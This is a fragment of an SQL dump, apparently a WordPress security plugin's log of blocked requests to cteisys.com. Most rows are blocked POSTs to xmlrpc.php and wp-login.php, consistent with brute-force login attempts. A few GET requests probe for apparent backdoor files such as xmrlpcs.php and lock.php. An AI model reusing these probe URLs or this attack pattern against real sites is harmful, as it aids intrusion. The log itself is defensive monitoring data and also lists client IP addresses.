Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','rlLJpV3YZEw9tCoIh1Fu2adj',0,1664870170.5858,1439,'','POST',403,0,515,0,1,'',0),('148.66.143.170',2487390122,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','7iD3QhCHfU6dG4pwM1vKVRIL',0,1664870070.5214,594,'','POST',403,0,515,0,1,'',0),('182.79.46.50',3058642482,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','nU87HecNzSsx0WkRgMb1Pl6h',0,1664870062.3160,524,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','UG3YhrfMqk0K8ENP96VjTpzi',0,1664870058.8601,523,'','POST',403,0,515,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','lBkn9Uzs0MabVF61fO785eY2',0,1664870053.0641,542,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','GBMbviFP32WAejoRw68ng0zs',0,1664870036.0527,481,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LWq0KUb4uNQjg2olwcCt3kXe',0,1664870032.2696,489,'','POST',403,0,515,0,1,'',0),('108.170.27.202',1823087562,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','3z5L9WiMrF4nPNJxusVwOZbg',0,1664870009.7829,18500,'','POST',403,0,515,0,1,'',0),('149.210.209.68',2513621316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','UFSldkpaYKCcPZWo37jNRzqy',0,1664870010.9351,17261,'','POST',403,0,515,0,1,'',0),('202.226.37.184',3403818424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','zNcM9PTmejDZ1EYblgHIf40u',0,1664870011.5972,16598,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','mMbCn0lRjEpdPAeOIH6wkZYz',0,1664865611.4644,18077,'','POST',403,0,600,0,1,'',0),('43.252.230.8',737994248,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','4pHPMA9gxLZn3zrW1kd7lfQb',0,1664865583.9689,527,'','POST',403,0,515,0,1,'',0),('59.106.13.177',996806065,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','6JrpYiWsZ5bzjReL1VNQ0FgB',0,1664865579.8433,570,'','POST',403,0,515,0,1,'',0),('82.180.175.149',1387573141,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','0N4ZWgu89nmRfjxlrH5KvSDc',0,1664865575.8840,589,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','W0ENImJFYQCvjSldDHb49qXs',0,1664865574.9837,833,'','POST',403,0,515,0,1,'',0),('52.179.81.192',884167104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','NtCmSFT497JOkupI05gWHEsh',0,1664865573.5716,566,'','POST',403,0,515,0,1,'',0),('185.220.174.115',3118247539,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Xb4wqFVsaDJoeG1p3UrlQ6C9',0,1664865571.7181,986,'','POST',403,0,515,0,1,'',0),('212.1.211.14',3556889358,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','9zyNh74dcWgJ6wnUf3EObtqY',0,1664865568.5498,634,'','POST',403,0,515,0,1,'',0),('91.208.99.2',1540383490,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','OV5Gm4nPMb69asJlQpzTDojt',0,1664865566.4494,516,'','POST',403,0,515,0,1,'',0),('178.62.213.234',2990462442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','yI51faqnJeTYGdwgpiLC4KQM',0,1664865565.5859,628,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','tkW39njavo4gNuI75FrV2fpz',0,1664865555.5601,7230,'','POST',403,0,515,0,1,'',0),('185.232.14.51',3118992947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','nvZVSGPWykqJgIsrwaMQ18tf',0,1664865553.6971,9005,'','POST',403,0,515,0,1,'',0),('185.232.14.51',3118992947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','uXgn5NzaDVosYGepv0EryWd2',0,1664865553.4711,9210,'','POST',403,0,515,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-admin.php?daksldlkdsadas=1&WordPress=0yw5JqWiblouTekU/k2n4jzYXw.txt&Database=wikindex.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','9dA0fQuGVNhYL6qtXP3C8Tw7',0,1664863451.0035,373,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/xmrlpcs.php?daksldlkdsadas=1&WordPress=0yw5JqWiblouTekU/k2n4jzYXw.txt&Database=wikindex.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','Nosc67kxDqG2pQUwifgajrWB',0,1664863449.5796,331,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/admin.php?daksldlkdsadas=1&WordPress=0yw5JqWiblouTekU/k2n4jzYXw.txt&Database=wikindex.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','DcYBHE4xjkFwXQsMNyuhaRol',0,1664863447.3758,324,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/lock.php?daksldlkdsadas=1&WordPress=0yw5JqWiblouTekU/k2n4jzYXw.txt&Database=wikindex.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','gw1LoSJb8eUXpPd6nqIMhVC9',0,1664863436.4153,316,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/3index.php?daksldlkdsadas=1&WordPress=0yw5JqWiblouTekU/k2n4jzYXw.txt&Database=wikindex.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','5o1jqz7H2hmSsfRUt4BpadJZ',0,1664863423.3212,11565,'','GET',403,0,700,0,1,'',0),('92.205.161.6',1556979974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Tyr1fXJUSM0kCPduKEhB8n4O',0,1664860918.2407,939,'','POST',403,0,515,0,1,'',0),('148.66.143.170',2487390122,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','XrZIkPGUKl4JABOt0Dmc8T6b',0,1664860912.2953,634,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','soBYWwFItf0mGZLJie36pczh',0,1664860907.5784,1356,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','FsaWqG6UVfwu8XAmS9cjo2v0',0,1664860901.8883,549,'','POST',403,0,515,0,1,'',0),('185.182.57.45',3115727149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','PM27aRm1VHrWcD8zsYfFXNxZ',0,1664860875.6837,19515,'','POST',403,0,515,0,1,'',0),('65.52.67.200',1093944264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','ZxzvmVjaqiku4y3w0PEDrnJI',0,1664860886.1002,9098,'','POST',403,0,515,0,1,'',0),('88.208.242.172',1490088620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','3IeT5laWSFnEHX69s1whvR4P',0,1664860878.2541,16944,'','POST',403,0,515,0,1,'',0),('198.98.48.183',3328323767,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','OyLVEwuvq0rQeZ6xz7bo3cMU',0,1664859279.2407,1291,'','POST',403,0,600,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','f9KTOdPAY372nvLcoiWMUDsq',0,1664857308.0908,1266,'','POST',403,0,515,0,1,'',0),('177.67.89.84',2973981012,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','VLYJfmrF1TK9c0ACt6IXQGkl',0,1664857304.3600,688,'','POST',403,0,515,0,1,'',0),('159.65.241.136',2671899016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','cdXgRZWu6iUoNOqPzI3DpMCK',0,1664857264.0075,1234,'','POST',403,0,515,0,1,'',0),('198.46.93.129',3324927361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','hJgqVRYAoTFy0QuG8w2ZsOzS',0,1664857263.7293,1382,'','POST',403,0,515,0,1,'',0),('202.61.232.31',3393054751,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','nBSCmapxlOeF2NPMzuWh7o1K',0,1664857258.9465,566,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','IsguH3hXNWiP71dnCflm8cbL',0,1664857257.4155,549,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dRfJOHMwVKmL2i9shXtpFYkP',0,1664857238.8371,14359,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','lPgb0NAfJo9rUmYWKTViu4Xa',0,1664857233.9473,19243,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','vmKZc7gJBOkwrbDQyFURi9xL',0,1664857235.1061,18083,'','POST',403,0,515,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','31EJhSMnPrv7Il40O6gH58jZ',0,1664856036.5058,2815,'','POST',403,0,600,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','iSQHRk8gUFMKLOYan5rzA97s',0,1664863225.7296,18064,'','POST',403,0,600,0,1,'',0),('85.214.79.202',1440108490,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','T5fAb06OnWg1uGyqJMpQXrhE',0,1664898510.2788,583,'','POST',403,0,515,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','uN17Bo4W5GFJSXOgp9xKIQ28',0,1664898514.3939,600,'','POST',403,0,515,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','LSUj6s1rYqnXcefHP5uo2bQJ',0,1664898506.9889,475,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Om6Gw7iZBqeQIXbo4MapWnAN',0,1664898501.4922,477,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','3jkDBAxLQNF4amehYOrglGv7',0,1664898497.9843,531,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','9rAjpNQk5WsauFe7yUZ23GqE',0,1664898492.7848,1233,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','eSJR0yEgKk64TOjvWDs2bNi1',0,1664898497.2217,508,'','POST',403,0,515,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','m0sINVQ75nGS968adoDRXOTh',0,1664898455.8316,465,'','POST',403,0,600,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','cbZlYfMSJaD1usTNwCtWGVk9',0,1664898489.5069,3195,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','3auDMCeftx6S4UlGvdcO7ZQq',0,1664897579.6619,1176,'','POST',403,0,600,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','WtsYFK6uijDH4w0cUrJqBAoN',0,1664898430.6384,18084,'','POST',403,0,600,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','gquvklwHWtmZ6c7zFoT8frnd',0,1664897553.7772,1251,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','5AJoV6gk3wPqf2CIOaynGvYB',0,1664896682.0329,1846,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','pV74uCG02zYnMNUmRxOHjZ9B',0,1664896707.0429,545,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','DuLQ7HGSjchdUZOas9elpEWC',0,1664897335.0066,545,'','POST',403,0,600,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','u6PyZxBkAHwWEvD7Ueij9t8o',0,1664896424.5679,17210,'','POST',403,0,600,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','IvD7eO1yFEAqriQ0S3HfZhaR',0,1664895962.4256,888,'','POST',403,0,515,0,1,'',0),('207.244.229.40',3488933160,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','OV94SFr0w2Jv5fBe7izUIQGh',0,1664895961.5534,1085,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','81qsLWNDrmoBZSTwy7C5Jav3',0,1664895945.7349,3659,'','POST',403,0,515,0,1,'',0),('198.46.93.129',3324927361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','grAU8TWLb0xYuRyzKpOCom5S',0,1664895946.4961,2227,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','FVQcdbqI9u1pK3JkmDisOLXT',0,1664895943.1706,634,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','oNzvWRc0YEkbi4Z3hnGjUIlA',0,1664895939.0195,2220,'','POST',403,0,515,0,1,'',0),('82.165.83.165',1386566565,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','trJWQF5fc7oa3ADLzbdhn8pI',0,1664895938.5117,2725,'','POST',403,0,515,0,1,'',0),('181.174.125.214',3048111574,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','dbDpOtI238ufTUmX5PxqVK4R',0,1664895836.2203,1695,'','POST',403,0,600,0,1,'',0),('27.72.145.33',457740577,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','M58BXb7FOKeVZDwmUr6EScq9',0,1664895811.8829,1375,'','POST',403,0,600,0,1,'',0),('152.228.208.88',2565132376,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','jsYiRyle6OgWnBMJEVoPfCqh',0,1664894954.1218,450,'','POST',403,0,600,0,1,'',0),('138.68.90.29',2319735325,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','LB5fWgrU9ZcQxENb83lPm2HF',0,1664894929.9932,18029,'','POST',403,0,600,0,1,'',0),('157.230.44.8',2649107464,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','fkr4sAjQKCbuz0LMUwoG238d',0,1664894078.0144,546,'','POST',403,0,600,0,1,'',0),('150.136.250.229',2525559525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','sqXUSvfEIme78H1V4dMgbDLT',0,1664894054.5533,17545,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','O7wiRLGSrkA9PJ285QpNhaWv',0,1664893284.2053,1317,'','POST',403,0,600,0,1,'',0),('85.146.18.88',1435636312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','cvBFbPgozwZiHM7GrKhIEy1q',0,1664893200.2605,1436,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','zc1xIgtHZ4kUaKvny7bhsf2G',0,1664893174.1833,17631,'','POST',403,0,600,0,1,'',0),('82.165.184.74',1386592330,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','SXZqjClwkhbVxfcO8LrgN9Jo',0,1664892300.5409,18513,'','POST',403,0,600,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','GQwxk5eJrhUW0XTNRDvE7CLY',0,1664892325.6580,613,'','POST',403,0,600,0,1,'',0),('69.16.238.78',1158737486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zpJD06cfmXoqAhGS8dLP3gkR',0,1664980335.0003,19096,'','POST',403,0,515,0,1,'',0),('84.39.116.180',1411871924,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KcX36Qh49d5RSNkjvenAWFTD',0,1664989819.4273,18933,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','KGCyNu9FcbYtM4mQliSpnTa5',0,1664997463.0114,546,'','POST',403,0,600,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 